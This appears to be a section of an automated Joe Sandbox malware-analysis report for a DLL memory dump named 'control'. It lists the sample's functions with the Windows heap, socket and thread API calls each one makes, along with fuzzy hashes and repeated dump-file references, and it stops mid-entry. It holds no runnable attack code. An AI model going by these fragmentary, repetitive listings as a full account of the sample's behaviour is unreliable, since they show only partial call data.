                                                      • Instruction ID: c803a41f29da07c650d3c58594bacb453c4fb1dd27e1a6e1f1a30392c0a1c04b
                                                      • Opcode Fuzzy Hash: 47b4105fe6b3e3161048d5cd8b82993bfb555cfdef2340cd0389ffd279ded10a
                                                      • Instruction Fuzzy Hash: A151F3B2802261DED305CF2BCCD1159BFA4FB59314BEA826ED01997A69C7FD5440CF11
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog_memmove
                                                      • String ID:
                                                      • API String ID: 3529519853-0
                                                      • Opcode ID: 3de3e2a48b5775badc1debb1eaec8da4561501d38b2832b597580eb88c9b2799
                                                      • Instruction ID: f0bbad769ef49d029823e4ceb201cbe743862221fd5fa22a91b3a39b8f15cb5d
                                                      • Opcode Fuzzy Hash: 3de3e2a48b5775badc1debb1eaec8da4561501d38b2832b597580eb88c9b2799
                                                      • Instruction Fuzzy Hash: 4621C471A043069FEB24CF68D84045EB7F5EB842A0B214A2EE856E7286DB31AD41C7A0
                                                      APIs
                                                      • HeapCreate.KERNELBASE(?,?,00000000,00000000), ref: 1001E47F
                                                        • Part of subcall function 1001F4D0: HeapCreate.KERNELBASE(00000000,00000000,00000000,00000004,00000068,1001F266,?,?,?,?,?,000000FF,?,1000D70F,?,10065258), ref: 1001F4F5
                                                        • Part of subcall function 1001F4D0: _free.LIBCMT ref: 1001F535
                                                        • Part of subcall function 1001F600: CreateSemaphoreA.KERNEL32(00000000), ref: 1001F67A
                                                        • Part of subcall function 1001F600: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,00000000), ref: 1001F68E
                                                      • _free.LIBCMT ref: 1001E4DD
                                                        • Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
                                                        • Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Create$Heap$Semaphore_free$ErrorFreeLast
                                                      • String ID:
                                                      • API String ID: 728542959-0
                                                      • Opcode ID: 222fa050d65441ebb13fcd7a4239098d54289be2c941337644281796d787a4a5
                                                      • Instruction ID: 800e16aa3107edb63feffa1116bd34484aa86493a69fc312601903e07da96963
                                                      • Opcode Fuzzy Hash: 222fa050d65441ebb13fcd7a4239098d54289be2c941337644281796d787a4a5
                                                      • Instruction Fuzzy Hash: B33110B4405B44DFE360CF64C959B9BBBE4FB04708F008A1DE4AA9B7C1D7B9A548CB91
                                                      APIs
                                                      • GetNativeSystemInfo.KERNELBASE(?,93656AD3,?,?,?,10050CCE,000000FF,?,1001EB0B,93656AD3), ref: 10025E61
                                                      • GetNativeSystemInfo.KERNEL32(?,?,?,?,10050CCE,000000FF,?,1001EB0B,93656AD3), ref: 10025E7C
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InfoNativeSystem
                                                      • String ID:
                                                      • API String ID: 1721193555-0
                                                      • Opcode ID: 877375556be0117ef64599603d89de48dfc01519870d57c53b358f5f053519b0
                                                      • Instruction ID: 59a8315101be3ab263f7812ecb0399de6b67e1f0b14bca8f03ae134136496eb9
                                                      • Opcode Fuzzy Hash: 877375556be0117ef64599603d89de48dfc01519870d57c53b358f5f053519b0
                                                      • Instruction Fuzzy Hash: 60115E72944258DFDB04CF98ED85BA9B7F8F709714F40466AE80AD3B50D77AA510CF44
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ComputerH_prologName
                                                      • String ID:
                                                      • API String ID: 2340896887-0
                                                      • Opcode ID: cc6b2500ecca3743cbec3c9324481d097cb05a05992e836556c9dcd252150570
                                                      • Instruction ID: 1d68eca033c9043e72de2a4286cf069eb490a1f05f2ee87c86d81987e30c12f2
                                                      • Opcode Fuzzy Hash: cc6b2500ecca3743cbec3c9324481d097cb05a05992e836556c9dcd252150570
                                                      • Instruction Fuzzy Hash: 69011AB2D0012DAEDB15DF94D882AEEB7BCEB04344F0040AAA609E3241D7745F888BE0
                                                      APIs
                                                      • HeapCreate.KERNELBASE(00000000,00000000,00000000,00000004,00000068,1001F266,?,?,?,?,?,000000FF,?,1000D70F,?,10065258), ref: 1001F4F5
                                                      • _free.LIBCMT ref: 1001F535
                                                        • Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
                                                        • Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$CreateErrorFreeLast_free
                                                      • String ID:
                                                      • API String ID: 910146552-0
                                                      • Opcode ID: 0922f84f53244fe7791218adaa3a609704bf451642154910021beb8acc3574b0
                                                      • Instruction ID: f604b513f122066b879ad4c2375b27ded08a991e1fe4a324105a739978d0ea99
                                                      • Opcode Fuzzy Hash: 0922f84f53244fe7791218adaa3a609704bf451642154910021beb8acc3574b0
                                                      • Instruction Fuzzy Hash: D5019DB1200B06ABE3048F25D828B42FBA4BB45309F008219D6448BA80D3FAB568CFD1
                                                      APIs
                                                      • HeapCreate.KERNELBASE ref: 1001F7D5
                                                      • _free.LIBCMT ref: 1001F815
                                                        • Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
                                                        • Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$CreateErrorFreeLast_free
                                                      • String ID:
                                                      • API String ID: 910146552-0
                                                      • Opcode ID: e6d0383cc91ec11f146a235d1bf25ba9ad7322c782b11b51e059047d5a17b778
                                                      • Instruction ID: 012904b8805aae3dbedbbf78297134198325bffc3ea54a5c621821fb0c9ecd51
                                                      • Opcode Fuzzy Hash: e6d0383cc91ec11f146a235d1bf25ba9ad7322c782b11b51e059047d5a17b778
                                                      • Instruction Fuzzy Hash: 0701AFB5200B06ABE304CF25D828B42FBB4FB55309F008219D5448BB80D7FAE468CFD1
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ___copy_path_to_wide_string_free
                                                      • String ID:
                                                      • API String ID: 339592613-0
                                                      • Opcode ID: 64c3faf5b09213681eb0f59f94c2ded8d5cf0a0c29d89a77047ce6c367243897
                                                      • Instruction ID: 424f71bbd37a06cd7e57c26e38fcdaf5a0552f039bab1a5dfaedcc90aead64a7
                                                      • Opcode Fuzzy Hash: 64c3faf5b09213681eb0f59f94c2ded8d5cf0a0c29d89a77047ce6c367243897
                                                      • Instruction Fuzzy Hash: D2F01C3651010DFFDF028F95DD02DDEBBAAEF093A9F204554FA10A51A0E776DA20EB94
                                                      APIs
                                                      • closesocket.WS2_32(00000000), ref: 10017A62
                                                      • WSAGetLastError.WS2_32(?,?,?,?,?,00000001), ref: 10017A6D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLastclosesocket
                                                      • String ID:
                                                      • API String ID: 1278161333-0
                                                      • Opcode ID: 418d5f1c60f72aecd0ac59fde21019ddb0d4259f61bb1c6b821ef0e2c7ece541
                                                      • Instruction ID: c10fd3888be95ff44920b7b525900d4ac3c0e5df11b5dd3981ea2acee834d5df
                                                      • Opcode Fuzzy Hash: 418d5f1c60f72aecd0ac59fde21019ddb0d4259f61bb1c6b821ef0e2c7ece541
                                                      • Instruction Fuzzy Hash: C0E0EC31400A229BC7109F68E84428A77B1AF45334F61C649E07A865F0C332EDC29A40
                                                      APIs
                                                      • _malloc.LIBCMT ref: 10009E84
                                                        • Part of subcall function 10033888: _malloc.LIBCMT ref: 100338A0
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _malloc
                                                      • String ID:
                                                      • API String ID: 1579825452-0
                                                      • Opcode ID: 36e8143cb793aae47c3215e2a0272e872962c2ef56a3f7046bc436d098895e6f
                                                      • Instruction ID: 90c222bfae742fec60398cccdc4e1f23cd5be1458402abc6deef91bfde91d8dd
                                                      • Opcode Fuzzy Hash: 36e8143cb793aae47c3215e2a0272e872962c2ef56a3f7046bc436d098895e6f
                                                      • Instruction Fuzzy Hash: E2F06771208349AEE354CF69D401B16F7E8EF153A5F20842EE449CB291EBB6E8418BA1
                                                      APIs
                                                      • _free.LIBCMT ref: 100094FC
                                                        • Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
                                                        • Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorFreeHeapLast_free
                                                      • String ID:
                                                      • API String ID: 1353095263-0
                                                      • Opcode ID: c39f6b2e62117450a105f5e4cab03e9ceeeea375de70d4d1b1917068cc197d60
                                                      • Instruction ID: d8f828a40b2b730194e8aba937afc0051e5cb378dd47fda6167a8c8fdc332205
                                                      • Opcode Fuzzy Hash: c39f6b2e62117450a105f5e4cab03e9ceeeea375de70d4d1b1917068cc197d60
                                                      • Instruction Fuzzy Hash: 83F058325045139FE712DB1AE840F95F7E4EF907A2B224126E504A71A9CB30BCA1CBE0
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 10009058
                                                        • Part of subcall function 10009005: __EH_prolog.LIBCMT ref: 1000900A
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog
                                                      • String ID:
                                                      • API String ID: 3519838083-0
                                                      • Opcode ID: 8f174c59e55ee46aa1a0518bf9910ef7bcc233a2a1d8cc6bb2ecf2f82cef4e6c
                                                      • Instruction ID: c6297489b9343aa14daceb2b23b854b15629787c9eaf3216ec455666ea5a6765
                                                      • Opcode Fuzzy Hash: 8f174c59e55ee46aa1a0518bf9910ef7bcc233a2a1d8cc6bb2ecf2f82cef4e6c
                                                      • Instruction Fuzzy Hash: 2DF0DA76900649AFDF01CFE8C801ADEB7B1FF48354F004425EA01E3211D7399A149BA5
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog
                                                      • String ID:
                                                      • API String ID: 3519838083-0
                                                      • Opcode ID: 082614ae51f8eaab92f8fd4fcbd49f14c1e35ad109d2f292faef18787c312c3c
                                                      • Instruction ID: d8b04152d89935f80a21dc8e5be05f0eecfdb8387a64987abe8c677b8d63aa7e
                                                      • Opcode Fuzzy Hash: 082614ae51f8eaab92f8fd4fcbd49f14c1e35ad109d2f292faef18787c312c3c
                                                      • Instruction Fuzzy Hash: 82F0F2B6A04649AFEB01CFA8C501ADEB7B5EB08314F104466E901F7261D735AE158B66
                                                      APIs
                                                      • _malloc.LIBCMT ref: 1001A17E
                                                        • Part of subcall function 100339BC: __FF_MSGBANNER.LIBCMT ref: 100339D3
                                                        • Part of subcall function 100339BC: __NMSG_WRITE.LIBCMT ref: 100339DA
                                                        • Part of subcall function 100339BC: RtlAllocateHeap.NTDLL(02E60000,00000000,00000001,00000000,?,00000000,?,10039271,00000000,00000000,00000000,?,?,10037A2F,00000018,1005F658), ref: 100339FF
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap_malloc
                                                      • String ID:
                                                      • API String ID: 501242067-0
                                                      • Opcode ID: 2c2698d9046910f35f71d844e2ee760e71884a89bdce3fdce241900a1686537b
                                                      • Instruction ID: 36140bd552ea7598696e433675d61f7601ae88bce914a68567ec45485bf916f3
                                                      • Opcode Fuzzy Hash: 2c2698d9046910f35f71d844e2ee760e71884a89bdce3fdce241900a1686537b
                                                      • Instruction Fuzzy Hash: BCF0D4B190AB908FC378CF29A541203FBE0AB187107108E2FE0EAC7B80D3B0A444CF58
                                                      APIs
                                                      • CreateThread.KERNELBASE(00000000,00000000,1001C9A2,?,00000000,00000000), ref: 1001E0C3
                                                        • Part of subcall function 1001E1A7: closesocket.WS2_32(?), ref: 1001E1BD
                                                        • Part of subcall function 1001E1A7: closesocket.WS2_32(?), ref: 1001E1C8
                                                        • Part of subcall function 1001E1A7: closesocket.WS2_32(?), ref: 1001E1D4
                                                        • Part of subcall function 1001E1A7: Sleep.KERNELBASE(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E1EE
                                                        • Part of subcall function 1001E1A7: TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E1F5
                                                        • Part of subcall function 1001E1A7: CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E1FA
                                                        • Part of subcall function 1001E1A7: Sleep.KERNEL32(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E20C
                                                        • Part of subcall function 1001E1A7: TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E213
                                                        • Part of subcall function 1001E1A7: CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E218
                                                        • Part of subcall function 1001E1A7: Sleep.KERNEL32(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E22A
                                                        • Part of subcall function 1001E1A7: TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E231
                                                        • Part of subcall function 1001E1A7: CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E236
                                                        • Part of subcall function 1001E1A7: Sleep.KERNEL32(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E248
                                                        • Part of subcall function 1001E1A7: TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E24F
                                                        • Part of subcall function 1001E1A7: CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E254
                                                        • Part of subcall function 1001E1A7: Sleep.KERNELBASE ref: 1001E26F
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: SleepThread$CloseHandleTerminate$closesocket$Create
                                                      • String ID:
                                                      • API String ID: 4110853011-0
                                                      • Opcode ID: 087594ae852631b1769bd4bec608cb617506a2bc0a30da82affd88f2c824ebc1
                                                      • Instruction ID: 6a280082d855df33ede7dbe1d76fd2287fd5124dc276dd059ab29f99ddadefcf
                                                      • Opcode Fuzzy Hash: 087594ae852631b1769bd4bec608cb617506a2bc0a30da82affd88f2c824ebc1
                                                      • Instruction Fuzzy Hash: 34E04874406BD16DF362D235894876B6ECCDF45354F45146DE483C7942D6B4FCC48761
                                                      APIs
                                                      • _free.LIBCMT ref: 1001A1BE
                                                        • Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
                                                        • Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
